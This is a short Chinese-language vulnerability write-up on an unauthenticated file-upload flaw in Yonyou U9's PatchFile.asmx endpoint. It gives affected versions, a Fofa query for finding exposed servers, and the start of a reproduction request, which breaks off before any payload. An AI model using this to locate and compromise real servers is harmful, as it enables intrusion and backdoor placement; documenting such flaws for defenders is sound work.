简介
用友U9是全球第一款基于SOA云架构的多组织企业互联网应用平台, U9秉承互联网基因, 以精细化管理、产业链协协同与社交化商业,帮助多组织企业(多事业部/多地点/多工厂/多法人)在互联网时代实现商业模式创新、组织变革与管理升级。
漏洞简介
用友U9 PatchFile.asmx接口处存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
影响版本
用友U9 <= V6.6企业版
Fofa:
title==" U9-登录 "
漏洞复现
使用以下数据包向服务器发送请求,为base64加密的数据
POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 1